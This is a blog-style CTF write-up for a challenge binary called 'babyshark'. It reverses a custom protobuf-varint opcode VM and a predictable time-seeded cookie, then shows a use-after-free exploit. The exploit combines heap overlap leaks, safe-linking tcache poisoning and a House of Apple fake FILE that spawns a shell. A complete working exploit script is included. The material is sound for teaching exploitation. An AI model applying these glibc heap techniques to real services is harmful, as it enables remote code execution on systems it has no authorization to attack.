It's been a long time since I published a CTF challenge writeup. I've been immersed in numerous offline competitions as the pwner on my team while juggling full-time work. I did plan to write up the good ones for learning purposes, but an unforgiving schedule left that goal perpetually out of reach.

Here comes a recent challenge I pwned: the chain spans a heap use-after-free (UAF), an IO_FILE-style exploit, VM nuances, data-serialization pitfalls, and a bespoke protobuf implementation.

1. Overview

The challenge binaries are hosted here in my repo.

Checksec:

    $ checksec ./babyshark
    Arch: amd64-64-little
    RELRO: Full RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: PIE enabled
    SHSTK: Enabled
    IBT: Enabled

Nearly every modern mitigation is engaged; the lone gap is the absent stack canary. A stack-based approach is a deliberate detour, an unproductive rabbit hole, so for all practical purposes the binary is fully hardened, lacking only a sandbox restriction.



Launching the target yields nothing beyond a terse greeting, but the prompt strongly hints at heap manipulation as the intended attack surface:

As pwners, we can reasonably infer that this revolves around a miniature VM: only precisely encoded inputs/opcodes will coax the binary into meaningful interaction.

2. Reversing

The vulnerable binary is stripped:

    $ file ./babyshark
    babyshark: ELF 64-bit LSB pie executable, x86-64, dynamically linked, ... stripped

…which forces arduous reverse-engineering from the outset:



When the decompiler vomits a forest of anonymous local variables, it's usually a tell: bespoke data structures and custom types lurk beneath IDA's surface, and the tool cannot reconstruct their layouts. The reversing effort becomes a painstaking exercise—especially in an offline, AI-forbidden CTF where quick internet aids are unavailable.

I won't catalogue every detour and dead end; instead, I'll present a well-reversed version in which I have already reconstructed several key data structures, making the code snippets much more organized and understandable.

2.1. Cookie



At program start sub_12A9 (which I renamed init) runs a short prologue:

It seeds a classic C PRNG with the current timestamp — srand(time(NULL)). Because time() has only second resolution, the seed is blatantly predictable. The RNG output is truncated to a single byte and stored in the global byte_4280 — the challenge's Cookie. We can trivially emulate this in Python with ctypes:

    from ctypes import *

    lib = CDLL("./libc.so.6")
    lib.srand(lib.time(0))
    cookie = (lib.rand()) & 0xff

This Cookie is later used as an encoding mask for input.
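Because the seed is a one-second timestamp, the local guess can be off by a second or two when the exploit host and the target disagree on the time. The following is a minimal sketch, not part of the original exploit, that enumerates the cookie for every seed in a small window. The names `candidate_cookies`, `first_rand` and `libc_first_rand` are hypothetical helpers introduced for illustration; `libc_first_rand` assumes the target's libc is available at `./libc.so.6`.

```python
import time
from typing import Callable, Dict, Optional


def candidate_cookies(first_rand: Callable[[int], int],
                      now: Optional[int] = None,
                      skew: int = 2) -> Dict[int, int]:
    """Map every seed in [now - skew, now + skew] to its cookie byte.

    first_rand(seed) is a hypothetical callable that returns the first
    rand() value produced after srand(seed).
    """
    if now is None:
        now = int(time.time())
    return {seed: first_rand(seed) & 0xFF
            for seed in range(now - skew, now + skew + 1)}


def libc_first_rand(seed: int, libc_path: str = "./libc.so.6") -> int:
    """One possible first_rand: srand(seed) then rand() through ctypes."""
    from ctypes import CDLL
    lib = CDLL(libc_path)
    lib.srand(seed)
    return lib.rand()
```

With the real libc this would be called as `candidate_cookies(libc_first_rand)`; if the first guess fails, the neighbouring seeds give the next cookies to try.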

2.2. Opcodes

2.2.1. Serialization

Before the heap menu appears the binary consumes a stream of opcodes:



The readOpcode routine ingests input in two phases:

There are two distinct calls to vmRead, which is essentially a guarded wrapper around read.

First vmRead ingests the encoded header — parsing the opcode length and driving the subsequent malloc branches so the program allocates a suitably sized heap chunk for that opcode.

After allocation, a second vmRead pulls the actual opcode payload into the freshly-allocated buffer. It returns the buffer pointer and the byte count via caller arguments back to main, handing off both the payload and its length for decoding/execution.



This presents an implementation of the serialization process:

This is not as straightforward as PHP serialized payloads represented as raw strings. The opcodes are encoded within a protocol layer — the decode function parses that layer and treats the 1st vmRead value as the opcode length.

2.2.2. Decode





The decode function ingests a protobuf-style byte stream and decodes it one byte at a time:

- It walks the bytes at opcode up to nbytes, but no more than 10 (v7 <= 9 → up to 10 iterations).
- For each byte (byteOp) it:
  - takes the low 7 bits: (byteOp & 0x7F),
  - shifts them left by shift (0, 7, 14, ...), and ORs them into the accumulator v9.
- The test if (byteOp >= 0) checks the signed value, i.e. MSB == 0 indicates the final byte. When seen, it writes:
  - *code = v9 (the decoded integer),
  - *len = v7 (how many bytes were consumed).



This is the canonical LEB128 / protobuf varint encoding: the MSB is the continuation bit, each byte carries 7 payload bits, and the value is little-endian.



This image illustrates an example: 0x85 0x01 decodes to the integer 133 (computed as (0x01 << 7) | 0x05), consuming 2 bytes.
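The arithmetic of that example can be checked with a few lines of Python. This is a self-contained sketch of the varint rule described above; `varint_decode` is a name chosen here for illustration, not a function from the binary.

```python
from typing import Tuple


def varint_decode(data: bytes) -> Tuple[int, int]:
    """Return (value, bytes_consumed) for the varint at the start of data."""
    value = 0
    for i, byte in enumerate(data[:10]):       # at most 10 bytes are examined
        value |= (byte & 0x7F) << (7 * i)      # low 7 bits, least-significant group first
        if (byte & 0x80) == 0:                 # MSB clear marks the final byte
            return value & (2**64 - 1), i + 1
    raise ValueError("unterminated varint")


value, used = varint_decode(bytes([0x85, 0x01]))
print(value, used)   # 133 2
```

The first byte contributes 0x05, the second contributes 0x01 shifted left by 7, and the cleared MSB of the second byte ends the number.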

Therefore, when composing serialized opcodes we must prefix each payload with its varint length specifier:
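As a rough illustration of that framing rule, the sketch below prepends the varint-encoded length to a payload. `varint` and `frame` are stand-in names for this example only; the exploit script sends the length and the payload as two separate writes, but the bytes on the wire are the same.

```python
def varint(n: int) -> bytes:
    """Encode a non-negative integer as a protobuf-style varint."""
    out = bytearray()
    while True:
        low = n & 0x7F
        n >>= 7
        out.append((low | 0x80) if n else low)   # set MSB while more groups follow
        if not n:
            return bytes(out)


def frame(payload: bytes) -> bytes:
    """Length header (first read) followed by the payload (second read)."""
    return varint(len(payload)) + payload


print(frame(b"\x08\x05").hex())        # 020805
print(frame(b"A" * 200)[:2].hex())     # c801
```

A payload shorter than 128 bytes needs a one-byte header; the 200-byte case shows the header growing to two bytes.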

The decode implementation (Pythonic form):

    def decode(opcode_bytes: bytes, n: int):
        opcode = 0
        shift = 0
        size = 0
        mask = (1 << 64) - 1
        while size < n and size <= 9:
            b = opcode_bytes[size]
            size += 1
            opcode |= (b & 0x7f) << shift
            if (b & 0b1000_0000) == 0:
                return (opcode & mask), size
            else:
                shift += 7
        print("[-] decode failed")
        return None, 0

2.2.3. Encode

Our input must honor the protobuf-like contract—these bytes will be digested as the input for the next stage—so we invert the varint scheme.

In Python:

    def encode(opcode: int) -> bytes:
        """
        Encode integer n >= 0 as varint (7-bit groups, MSB=continuation).
        Returns the bytes that decode (0x140C) will parse.
        """
        opcode_bytes = bytearray()
        while True:
            b = opcode & 0x7f
            opcode >>= 7
            if opcode:
                b |= 0b1000_0000
                opcode_bytes.append(b)
            else:
                opcode_bytes.append(b)
                break
        return bytes(opcode_bytes)

2.2.4. Parsing





After slurping opcodes from stdin into heap-backed buffers, main invokes loadOpcode to dissect the payload:

__int64 loadOpcode(__int64 a1, unsigned __int64 a2, CodeBlock *cb)

I reconstruct a CodeBlock to hold the parsed members:

From there the flow is unambiguous: loadOpcode scans a buffer of protobuf-style varints and populates CodeBlock with option, index, size, and an optional length-delimited content:

- Zero the CodeBlock.
- While there are bytes left:
  - Read a varint token v10. Split it: field = v10 >> 3, wire = v10 & 7.
  - If wire == 2 (length-delimited):
    - Read the next varint len. Ensure len bytes remain.
    - If field == 4, set cb->content_ptr = pointer into original buffer, cb->content_len = len, and mark content_flag.
    - Skip those len bytes.
  - Else if wire == 0 (varint):
    - Read next varint dval.
    - Store dval into cb->option (field 1), cb->index (field 2), or cb->size (field 3) as appropriate and set the matching flag.
  - Any other wire value or decode/bounds failure → return -1.
- Return 0 on success.
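The steps above can be sketched in Python as a small parser. This is a model for building intuition, not the decompiled routine: it returns a dict instead of filling a CodeBlock, raises ValueError where the binary returns -1, and assumes that unknown varint fields are silently ignored. The names `read_varint` and `load_opcode` are chosen for this example.

```python
from typing import Dict, Tuple

FIELDS = {1: "option", 2: "index", 3: "size"}   # varint fields from the walkthrough


def read_varint(buf: bytes, pos: int) -> Tuple[int, int]:
    """Decode one varint at buf[pos:], returning (value, new_pos)."""
    value = 0
    for i in range(10):
        if pos + i >= len(buf):
            raise ValueError("truncated varint")
        byte = buf[pos + i]
        value |= (byte & 0x7F) << (7 * i)
        if not (byte & 0x80):
            return value, pos + i + 1
    raise ValueError("varint too long")


def load_opcode(buf: bytes) -> Dict[str, object]:
    """Parse a payload into a dict that mirrors the CodeBlock members."""
    cb: Dict[str, object] = {}
    pos = 0
    while pos < len(buf):
        tag, pos = read_varint(buf, pos)
        field, wire = tag >> 3, tag & 7
        if wire == 2:                               # length-delimited
            length, pos = read_varint(buf, pos)
            if pos + length > len(buf):
                raise ValueError("content runs past the buffer")
            if field == 4:
                cb["content"] = buf[pos:pos + length]
            pos += length                           # skip the bytes either way
        elif wire == 0:                             # varint
            value, pos = read_varint(buf, pos)
            if field in FIELDS:
                cb[FIELDS[field]] = value
        else:
            raise ValueError(f"unsupported wire type {wire}")
    return cb


print(load_opcode(bytes.fromhex("080118182205") + b"axura"))
# {'option': 1, 'size': 24, 'content': b'axura'}
```

The sample input is an add request: tag 0x08 is field 1 with wire type 0, tag 0x18 is field 3 with wire type 0, and tag 0x22 is field 4 with wire type 2.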

2.3. Index



Resuming the main execution flow: after opcode parsing, and before the program enters the menu logic, there is an additional, subtle step that derives the control index from the parsed opcodes:

When the index flag is present, the binary computes the index by XOR'ing the index byte with the previously initialized pseudo-random cookie, rotating the 8-bit result left by 5 bits, and keeping the low nibble:

    __int64 __fastcall get_idx(char a1)
    {
      return rol8(byte_4280 ^ a1, 5) & 0xF;
    }

The rotation primitive is the conventional 8-bit left-rotate:

    __int64 __fastcall rol8(unsigned __int8 a1, char a2)
    {
      // a2 = 5, 0b0101
      // (shl a1, 5) + (shr a1, 3)
      return (a1 << (a2 & 7)) | (unsigned int)((int)a1 >> (8 - (a2 & 7)));
    }

We can faithfully emulate this in Python:

    def _rol8(bins: int, r: int) -> int:
        return ((bins << (r & 7)) | (bins >> (8 - (r & 7)))) & 0xff

    def get_idx(data: bytes) -> int:
        # indexing bytes already yields an int, so no decode()/ord() is needed
        return _rol8(cookie ^ data[0], 5) & 0xf

To gain deterministic control over the menu index during exploitation, invert the transformation and produce an index encoder that yields an input byte which, after the binary's XOR+rol pipeline, evaluates to the desired idx:

    def encode_idx(idx: int) -> int:
        """
        y = cookie ^ x
        z = rol8(y, 5)
        z = (y << 5 | y >> 3) & 0xff
        z & 0xf = idx
        known idx (z), ask for x
        """
        y = ((idx >> 5) | (idx << 3)) & 0xff
        x = y ^ cookie
        return x

3. Pwn
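Before touching the heap menu, the index encoding from section 2.3 can be sanity-checked exhaustively. The sketch below re-implements both directions with the cookie passed as an explicit parameter (a change made here for testability, the article's helpers read a global) and confirms the round trip for every cookie and every slot index.

```python
def rol8(value: int, r: int) -> int:
    """Rotate an 8-bit value left by r bits."""
    r &= 7
    return ((value << r) | (value >> (8 - r))) & 0xFF


def ror8(value: int, r: int) -> int:
    """Rotate an 8-bit value right by r bits (inverse of rol8)."""
    r &= 7
    return ((value >> r) | (value << (8 - r))) & 0xFF


def get_idx(x: int, cookie: int) -> int:
    """What the binary computes from the input byte x."""
    return rol8(cookie ^ x, 5) & 0xF


def encode_idx(idx: int, cookie: int) -> int:
    """Input byte that the binary will map back to idx."""
    return ror8(idx, 5) ^ cookie


for cookie in range(256):
    for idx in range(16):
        assert get_idx(encode_idx(idx, cookie), cookie) == idx
print("round trip holds for all 256 cookies and 16 indices")
```

The inverse works because rotating right by 5 undoes the rotate-left by 5, and XOR with the same cookie cancels out.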



Having reverse-engineered the VM I/O, execution returns to the familiar heap menu primitives:



3.1. Add



The add routine is robust, with proper size and boundary validation:



The decompiled output becomes tidy once we reconstruct the List structure that orchestrates chunk allocations:

The add function validates size (0 < size <= 0x100000), finds the first unused entry in a 16-slot table, allocates size bytes, copies min(size, a3) bytes from the provided source into the allocation, records the pointer, size and copied content_len into the global structure struct List list, writes a single '\0' byte immediately after the copied block, and prints the index.
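To make that bookkeeping concrete, here is a toy Python model of the slot table. It is a sketch based only on the description above: `Slot`, `add`, and the -1 return value for rejected requests are assumptions of this model, and the extra byte in the buffer exists only so the model has room for the NUL terminator.

```python
from typing import List, Optional

MAX_SLOTS = 16
MAX_SIZE = 0x100000


class Slot:
    """One entry of the 16-slot table (field names follow the List struct)."""
    def __init__(self) -> None:
        self.size = 0
        self.content_len = 0
        self.buf: Optional[bytearray] = None
        self.in_use = False


def add(table: List[Slot], size: int, content: bytes) -> int:
    """Model of add(): returns the chosen slot index, or -1 on rejection."""
    if not 0 < size <= MAX_SIZE:
        return -1
    for idx, slot in enumerate(table):
        if not slot.in_use:
            break                        # first unused entry wins
    else:
        return -1                        # every slot is taken
    copied = min(size, len(content))
    buf = bytearray(size + 1)            # +1 only so the model can hold the NUL
    buf[:copied] = content[:copied]
    buf[copied] = 0                      # single NUL right after the copied block
    slot.size, slot.content_len = size, copied
    slot.buf, slot.in_use = buf, True
    return idx


table = [Slot() for _ in range(MAX_SLOTS)]
print(add(table, 0x18, b"axura"))        # 0
print(add(table, 4, b"abcdefgh"))        # 1
print(bytes(table[1].buf))               # b'abcd\x00'
```

The second call shows the truncation: only min(size, content length) bytes are copied, and the recorded content_len is the copied amount.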

Python helper to invoke add:

    def allo(size: int, content: bytes):
        """
        set option(1<<3) to 1; set size(3<<3); set content(2 | 4<<3)
        """
        pl_add = encode(1<<3) + encode(1)
        pl_add += encode(3<<3) + encode(size)
        pl_add += encode(2+(4<<3)) + encode(len(content)) + content
        pl_len = len(pl_add)
        s(encode(pl_len))
        s(pl_add)

The content payload requires no additional varint encoding here because the routine records a pointer into the payload; it simply memcpys the trailing bytes into the newly allocated, size-controlled chunk:

Runtime layout of the List structures:


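To see what an add request looks like on the wire, the sketch below builds the same bytes as the helper above without any network I/O. `add_request` is a name introduced for this example; `encode` repeats the varint encoder so the block runs on its own.

```python
def encode(n: int) -> bytes:
    """Unsigned varint: 7-bit groups, MSB set on every byte but the last."""
    out = bytearray()
    while True:
        low = n & 0x7F
        n >>= 7
        out.append((low | 0x80) if n else low)
        if not n:
            return bytes(out)


def add_request(size: int, content: bytes) -> bytes:
    """Length header plus payload for option 1 (add)."""
    body = encode(1 << 3) + encode(1)                  # field 1 (option) = 1
    body += encode(3 << 3) + encode(size)              # field 3 (size)
    body += encode((4 << 3) | 2) + encode(len(content)) + content  # field 4 (content)
    return encode(len(body)) + body


print(add_request(0x18, b"axura").hex(" "))
# 0b 08 01 18 18 22 05 61 78 75 72 61
```

Reading the dump left to right: 0b is the payload length, 08 01 selects option 1, 18 18 sets size 0x18, and 22 05 introduces five content bytes.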

3.2. Edit

The edit routine is intended to overwrite (or update) the content buffer of an existing slot and NUL-terminate the new content:

Behavior is benign when used normally. Opcode manipulator for this operation:

def edit(idx: int, content: bytes):

"""

set option(1<<3) to 2; set index(2<<3); set size(3<<3); set content(2 | 4<<3)

"""

pl_edit = encode(1<<3) + encode(2)

pl_edit += encode(2<<3) + encode(encode_idx(idx))

pl_edit += encode(3<<3) + encode(len((content)))

pl_edit += encode(2+(4<<3)) + encode(len(content)) + content

pl_len = len(pl_edit)

s(encode(pl_len))



s(pl_edit)3.3. Delete

delete frees the allocation for idx, clears the slot's in_use flag, and prints "freed":

The implementation avoids a classic UAF by nulling the stored pointer, yet it leaves the freed memory's contents intact — a potential information source if later reallocations overlap.

Python wrapper:

def free(idx : int):

"""

set option(1<<3) to 3; set index(2<<3)

"""

pl_free = encode(1<<3) + encode(3)

pl_free += encode(2<<3) + encode(encode_idx(idx))

pl_len = len(pl_free)

s(encode(pl_len))



s(pl_free)3.4. Show

show prints the stored content pointer for idx with puts, unless the slot is unused or a “no show” flag is set:

Python wrapper:

    def show(idx: int):
        """
        set option(1<<3) to 4; set index(2<<3)
        """
        pl_show = encode(1<<3) + encode(4)
        pl_show += encode(2<<3) + encode(encode_idx(idx))
        pl_len = len(pl_show)
        s(encode(pl_len))
        s(pl_show)

The “no-show” guard prevents a straightforward leak after calling the uaf backdoor described next; circumventing it will require careful heap feng-shui.



3.5. UAF

The challenge intentionally exposes a backdoor:

This path deliberately frees the buffer at idx, flips a per-slot “no-show/armed” bit and a global single-shot flag, prints "uaf armed", and then transfers control to overflow() — yielding a controlled use-after-free sink.

- if (flag) return puts("uaf once"): single-shot gate; refuse if already armed.
- index checks: ensure 0 ≤ idx < 16 and in_use[idx] == 1.
- if (!v2->content_dest) return puts("no buf"): the slot must have a buffer.
- free(v2->content_dest): deallocates the buffer; the pointer remains stored (dangling).
- HIDWORD(v2->in_use) = 1: sets the high 32 bits of the in_use field (a second flag slot) to 1; this toggles an adjacent flag used by show to prevent a direct data leak (but we can overcome this with well-designed heap feng-shui).
- flag = 1: sets the global armed flag.
- puts("uaf armed"); return overflow(): reports and jumps into overflow().
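The difference between delete and the backdoor is easiest to see in a toy state model. The sketch below tracks only the bookkeeping, with integers standing in for heap pointers; `Menu`, `Slot`, the `freed` log and the "bad idx" string are assumptions of this model, not names or messages taken from the binary.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Slot:
    content_dest: Optional[int] = None   # stand-in for the heap pointer
    in_use: bool = False
    no_show: bool = False                # models HIDWORD(in_use)


class Menu:
    def __init__(self) -> None:
        self.slots = [Slot() for _ in range(16)]
        self.armed = False               # global single-shot flag
        self.freed: List[int] = []       # log of pointers handed to free()

    def delete(self, idx: int) -> str:
        slot = self.slots[idx]
        if not slot.in_use:
            return "bad idx"
        self.freed.append(slot.content_dest)
        slot.content_dest = None         # pointer is cleared: no dangling reference
        slot.in_use = False
        return "freed"

    def backdoor(self, idx: int) -> str:
        if self.armed:
            return "uaf once"
        if not 0 <= idx < 16 or not self.slots[idx].in_use:
            return "bad idx"
        slot = self.slots[idx]
        if slot.content_dest is None:
            return "no buf"
        self.freed.append(slot.content_dest)   # freed, but the pointer stays stored
        slot.no_show = True
        self.armed = True
        return "uaf armed"


menu = Menu()
menu.slots[1] = Slot(content_dest=0x1000, in_use=True)
print(menu.backdoor(1), hex(menu.slots[1].content_dest))   # uaf armed 0x1000
print(menu.backdoor(1))                                    # uaf once
print(menu.delete(1), [hex(p) for p in menu.freed])        # freed ['0x1000', '0x1000']
```

The last line is the interesting one: because the slot stays in use with its stale pointer, a later delete on the same index hands the same address to free() a second time.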



overflow() hands us an unbounded buffer overflow:

No stack canary is evident; this looks tasty, but it's a rabbit hole. We must leak a libc address to reliably exploit the stack overflow, yet the uaf path is single-use. If we spend this one vulnerability on leaking addresses, we can never come back to the overflow entry point.

Python helper to trigger the backdoor:

    def uaf(idx: int):
        """
        set option(1<<3) to 9; set index(2<<3)
        """
        pl_uaf = encode(1<<3) + encode(9)
        pl_uaf += encode(2<<3) + encode(encode_idx(idx))
        pl_len = len(pl_uaf)
        s(encode(pl_len))
        s(pl_uaf)
        sla(b'your msg:\n', b"a")   # skip rabbit hole overflow()

4. EXP



Having unraveled the VM opcode parsing, the heap exploitation becomes a concise affair — a one-shot UAF produces predictable chunk overlap, which in turn yields a controllable overflow.

So the exploit plan is:

- Trigger the UAF backdoor to induce chunk overlap.
- Leak heap and libc addresses from the overlapped unsorted-bin metadata.
- Use the overlap to poison tcache freelist next pointers, enabling an arbitrary allocation.
- Write to that arbitrary allocation to obtain a write-what-where primitive.
- With write-what-where we can complete the pwn in multiple ways. For instance, overwrite _IO_list_all to point at a crafted FILE structure on the heap, then trigger the cleanup routine that walks the FILE list via a standard C exit call (House of Apple technique).

With an arbitrary write-what-where primitive, there are numerous routes to a shell on a remote binary. Beyond the IO FILE approach shown below, one can corrupt libc GOT entries (see my writeup on libc GOT hijacking). I also maintain an advanced example here, a companion reference for related techniques (House of Einherjar + libc GOT hijacking).
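The tcache poisoning step has to account for safe-linking, which glibc 2.32 and later apply to tcache and fastbin next pointers: the stored value is the real pointer XORed with the storage address shifted right by 12. The sketch below shows that arithmetic on its own, independent of the pwnkit helper used in the script; the two addresses are made-up values for illustration.

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """Mangle ptr for storage at address pos (glibc safe-linking)."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos: int, mangled: int) -> int:
    """Recover the real pointer from a mangled value read at address pos."""
    return (pos >> 12) ^ mangled


chunk_fd_addr = 0x55555555B2A0   # hypothetical address of the freed chunk's fd field
target = 0x7FFFF7E1B680          # hypothetical target; must be 16-byte aligned

fd = protect_ptr(chunk_fd_addr, target)
assert reveal_ptr(chunk_fd_addr, fd) == target
assert target % 16 == 0          # tcache rejects unaligned chunks
print(hex(fd))
```

This is why the heap leak has to come first: without knowing where the poisoned chunk lives, the value written into its next pointer cannot be mangled correctly.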

Final exploit script, implemented with the pwnkit framework as a debugging harness (acknowledging that the modules remain a work-in-progress and require further refinement):

    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    #
    # Title : Linux Pwn Exploit
    # Author: Axura (@4xura) - https://4xura.com
    #
    # Description:
    # ------------
    # A Python exp for Linux binex interaction
    #
    # Usage:
    # ------
    # - Local mode  : ./xpl.py
    # - Remote mode : ./xpl.py [ <HOST> <PORT> | <HOST:PORT> ]
    #

    from pwnkit import *
    from ctypes import *
    from typing import Tuple
    from pwn import *
    import sys

    # CONFIG
    # ---------------------------------------------------------------------------
    BIN_PATH = "./babyshark"
    LIBC_PATH = "./libc.so.6"
    host, port = load_argv(sys.argv[1:])
    ssl = False
    env = {}
    elf = ELF(BIN_PATH, checksec=False)
    libc = ELF(LIBC_PATH) if LIBC_PATH else None

    Context('amd64', 'linux', 'little', 'debug', ('tmux', 'splitw', '-h')).push()
    io = Config(BIN_PATH, LIBC_PATH, host, port, ssl, env).run()
    alias(io)   # s, sa, sl, sla, r, rl, ru, uu64, g, gp

    # VM
    # ------------------------------------------------------------------------
    lib = CDLL("./libc.so.6")
    lib.srand(lib.time(0))
    cookie = (lib.rand()) & 0xff
    # pd(cookie)

    def encode_idx(idx: int) -> int:
        """
        y = cookie ^ x
        z = rol8(y, 5)
        z = (y << 5 | y >> 3) & 0xff
        z & 0xf = idx
        known idx (z), ask for x
        """
        y = ((idx >> 5) | (idx << 3)) & 0xff
        x = y ^ cookie
        return x

    def encode(opcode: int) -> bytes:
        """
        Encode integer n >= 0 as varint (7-bit groups, MSB=continuation).
        Returns the bytes that decode_140C will parse.
        """
        opcode_bytes = bytearray()
        while True:
            b = opcode & 0x7f
            opcode >>= 7
            if opcode:
                b |= 0b1000_0000
                opcode_bytes.append(b)
            else:
                opcode_bytes.append(b)
                break
        return bytes(opcode_bytes)

    # HEAP
    # ------------------------------------------------------------------------
    """
    struct List
    {
        _QWORD *size;
        _QWORD *content_len;
        _QWORD *content_dest;
        _QWORD *in_use;
    }

    struct CodeBlock
    {
        unsigned __int64 option;
        unsigned __int64 index;
        unsigned __int64 size;
        unsigned __int64 content_ptr;
        unsigned __int64 content_len;
        unsigned __int32 choice_flag;
        unsigned __int32 index_flag;
        unsigned __int32 size_flag;
        unsigned __int32 content_flag;
    };
    """

    def allo(size: int, content: bytes):
        """
        set option(1<<3) to 1; set size(3<<3); set content(2 | 4<<3)
        """
        pl_add = encode(1<<3) + encode(1)
        pl_add += encode(3<<3) + encode(size)
        pl_add += encode(2+(4<<3)) + encode(len(content)) + content
        pl_len = len(pl_add)
        info(f"payload length for add: {pl_len}")
        # pd(pl_add)
        s(encode(pl_len))
        s(pl_add)

    def free(idx: int):
        """
        set option(1<<3) to 3; set index(2<<3)
        """
        pl_free = encode(1<<3) + encode(3)
        pl_free += encode(2<<3) + encode(encode_idx(idx))
        pl_len = len(pl_free)
        info(f"payload length for free: {pl_len}")
        # pd(pl_free)
        s(encode(pl_len))
        s(pl_free)

    def edit(idx: int, content: bytes):
        """
        set option(1<<3) to 2; set index(2<<3); set size(3<<3); set content(2 | 4<<3)
        """
        pl_edit = encode(1<<3) + encode(2)
        pl_edit += encode(2<<3) + encode(encode_idx(idx))
        pl_edit += encode(3<<3) + encode(len((content)))
        pl_edit += encode(2+(4<<3)) + encode(len(content)) + content
        pl_len = len(pl_edit)
        info(f"payload length for edit: {pl_len}")
        # pd(pl_edit)
        s(encode(pl_len))
        s(pl_edit)

    def show(idx: int):
        """
        set option(1<<3) to 4; set index(2<<3)
        """
        pl_show = encode(1<<3) + encode(4)
        pl_show += encode(2<<3) + encode(encode_idx(idx))
        pl_len = len(pl_show)
        info(f"payload length for show: {pl_len}")
        # pd(pl_show)
        s(encode(pl_len))
        s(pl_show)

    def uaf(idx: int):
        """
        set option(1<<3) to 9; set index(2<<3)
        """
        pl_uaf = encode(1<<3) + encode(9)
        pl_uaf += encode(2<<3) + encode(encode_idx(idx))
        pl_len = len(pl_uaf)
        info(f"payload length for uaf: {pl_len}")
        # pd(pl_uaf)
        s(encode(pl_len))
        s(pl_uaf)
        sla(b'your msg:\n', b"a")   # skip rabbit hole overflow()

    def exit():
        """
        set option(1<<3) to 5
        """
        pl = encode(1<<3) + encode(5)
        s(encode(len(pl)))
        s(pl)

    # EXPLOIT
    # ------------------------------------------------------------------------
    def exploit(*args, **kwargs):
        """
        heap fengshui
        """
        ru(b"ready\n")
        allo(0x18, b"axura")    #0
        allo(0xf08, b"a")       #1
        allo(0x48, b"a")        #2
        uaf(1)
        allo(0x458, b"a")       #3
        allo(0x458, b"a")       #4
        free(1)                 # 1 in usbin, overlap 3
        show(3)
        ru(b"freed\n")
        heap_base = uu64(r(6)) - 0xb90
        pa(heap_base)

        allo(0x458, b"a")       #1
        free(1)
        show(3)
        ru(b"freed\n")
        libc_base = uu64(r(6)) - 0x21ace0
        pa(libc_base)
        free(4)

        """
        tcache poisoning
        """
        allo(0x28, b"a")        #1
        allo(0x28, b"a")        #4
        allo(0x308, b"a")       #5
        free(4)
        free(1)                 # overlap 3, on top of tcache[0x30]

        libc.address = libc_base
        _IO_list_all = libc.sym._IO_list_all
        pa(_IO_list_all)

        slk = SafeLinking(heap_base=heap_base)
        fd = slk.encrypt(_IO_list_all)
        pa(fd)
        edit(3, p64(fd))

        """
        house of apple
        """
        _IO_wfile_jumps = libc.sym._IO_wfile_jumps
        system = libc.sym.system
        pa(_IO_wfile_jumps)
        pa(system)

        f_addr = heap_base + 0x340  #5, reuse for 3 structs: _IO_FILE_plus, _IO_wide_data, _IO_jump_t
        f = IOFilePlus("amd64")
        ffs = {
            "_flags":         u32(b"  sh"),     # 0x00 (u32 needs 4 bytes: two spaces + "sh")
            "_IO_read_ptr":   0,                # 0x08
            "_IO_write_base": 0x404300,         # 0x20
            "_IO_write_ptr":  0x404308,         # 0x28
            "_lock":          heap_base,        # 0x88
            "_wide_data":     f_addr,           # 0xa0
            "vtable":         _IO_wfile_jumps,  # 0xd8
        }
        f.load(ffs)
        # f.dump()
        f.set(0x68, system)         # __doallocate of (_IO_jump_t *) _wide_vtable
        pl = f.bytes + p64(f_addr)  # FILE->_wide_data->_wide_vtable at offset 0xe0

        allo(0x28, b"a")
        allo(0x28, p64(f_addr))     # write fake file addr into _IO_list_all
        edit(5, pl)                 # write fake FILE into fake file addr

        exit()                      # trigger io cleanup
        io.interactive()

    # PIPELINE
    # ------------------------------------------------------------------------
    if __name__ == "__main__":
        exploit()

Pwned:
